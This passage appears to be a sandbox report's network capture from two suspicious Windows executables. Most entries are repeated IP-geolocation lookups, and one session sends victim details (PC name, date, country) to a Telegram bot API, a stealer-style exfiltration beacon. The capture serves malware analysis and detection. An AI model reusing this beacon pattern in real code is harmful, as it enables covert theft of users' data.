<Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49741	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:24 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:24 UTC	882	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298507 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdwQtEfujYW6%2Bu45PHze4V9OJr0svHNVUM9CD%2FGe7kQq3qa%2FkzhUwb4bNunmfr0csY1D2x1ztyUF7fjhyEHFyc43rcRT6%2FrIYJV%2BCra0zROpXQLWkauZZKOpWjTdRYb%2FBfXGKEFe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2530d0141a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1697&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1695702&cwnd=239&unsent_bytes=0&cid=0fa62ff52c9634ed&ts=490&x=0"
2024-12-05 17:51:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49753	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:27 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:28 UTC	877	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298510 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1syXl8DvtjSfUYxs1AgSD15acsiKMZrqAEYJmZislN97C578nnKM6Ff0TEIYASUni42Ij2pG1HHRCl23ThIChzHjheSk9C%2FsdLu8n3kfA0OEt%2FNjDc8N7Pgu%2Fu%2BGMnFd7INXZT4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e267de9ac436-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1702&rtt_var=851&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4240&recv_bytes=699&delivery_rate=104636&cwnd=220&unsent_bytes=0&cid=a546439c0da678cd&ts=485&x=0"
2024-12-05 17:51:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49752	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:27 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:28 UTC	887	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298510 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQRChQf%2FQZeS1WkFIz86tOY%2F1PASBPh3awxZAi%2Bkf35PkEEXWtxor%2BDMAFVu%2F%2FoVnN5EFTkvwe5tpI2lQhLTIRP00iW%2Bm4WNmh3tWy7gHiCfgagy14B2RyrXv4eEtZ59%2FIrQ%2BeDy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e267cc6418d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=111395&cwnd=184&unsent_bytes=0&cid=c9c5afe9d6aaa7a2&ts=496&x=0"
2024-12-05 17:51:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49765	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:30 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:31 UTC	870	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298514 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpJMno3Lm2oNQY0JyGvR8ZBnzLjRdaScnbiRUU94NaguCJ1Vc2Uv14eCOAUO8Nfrmnv4GbjUXr5YAfQCg64JvmmMjATFC5mxKN5W6jogeLV3FHvR9BPiPvkzGwmkmxBrT2MwC20n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e27c4ffb8c47-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1990&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1409266&cwnd=230&unsent_bytes=0&cid=6505892a68d6924d&ts=480&x=0"
2024-12-05 17:51:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49766	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:31 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:31 UTC	878	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298514 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxpegQKO3UYUIOdkVoPiQYdV%2BegXNCvuPemRx6Q%2B0KPAaoplDYscB2ze4PiGAXoHyuDfzBThRbjEKeTlglTbTbBtn3JsPq5FBvrS%2BDQ5Pq2OaxpKck1mapkh%2F0NUJQnvVR44IVOV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e27cfaaf43df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1603&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1821584&cwnd=243&unsent_bytes=0&cid=dbfc6e0641b07b8f&ts=463&x=0"
2024-12-05 17:51:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49775	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:34 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:34 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298517 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9WxnbeVWNz5qLDCsnbLAaaDdzEBu%2Fwk8EkRofKZd1SdeB%2BR5j3q8tIgppskFJQuoqlEqmXk6ik4xJpGT63BifxyCsGNXF0B%2Fbv0aMyYVYAEyUn0dkcsOs1x3aRKFtCqtpkjJISML"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2909f888c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1986&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1441263&cwnd=235&unsent_bytes=0&cid=7259d04085085bca&ts=467&x=0"
2024-12-05 17:51:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49776	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:34 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:34 UTC	882	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298517 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2F%2FV90x79p5R0Z6KlBXf8GZMh9%2BlrGdXacCpFaq%2Fnqhifas9zUoDVtrsRlqi1ri2S%2FxifnAp0rzeZQddmkcoOzDQJbQOdhg0AFkrTscAwPOJ4mT%2Fq9prJYLIFdJQA9y6msWzycdu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2913cd88ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1943&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1462925&cwnd=168&unsent_bytes=0&cid=b1901960cf632c25&ts=460&x=0"
2024-12-05 17:51:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49788	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:37 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:37 UTC	886	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298520 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8bNUD6OxinE%2Fn1wSI6q86wuOJtws%2B%2F4YNjaO9JDEDVa%2BTvfu113G4YC0s%2FartTbWzaW3KLSaNepg%2Fq6%2BxZzRFaWdgeGE5beiA%2FzYVqXgx07TMo66gF88POcHFpftEqi2HClUGjjO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2a50b08c3eb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1701&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1716637&cwnd=240&unsent_bytes=0&cid=00f5150b12d3090c&ts=472&x=0"
2024-12-05 17:51:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49789	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:37 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:38 UTC	884	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298521 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmZnS3nwPoFlQR5f2LTzs%2FKpSjCNsJ8p0QGWQ4%2BbsRa%2BfMkKGfGQIePC4yVIPs1BLIDKZzUPdDPqC0BSv1fLmPAvUZcRYShZjd%2FATu0yi%2FmbfKZzJxAt89uStM9XQ%2BLDmsZaKWqC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2a71d464315-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1600&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1604395&cwnd=218&unsent_bytes=0&cid=02ab645e29559b67&ts=537&x=0"
2024-12-05 17:51:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49795	149.154.167.220	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:39 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-05 17:51:39 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 05 Dec 2024 17:51:39 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-05 17:51:39 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49799	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:41 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
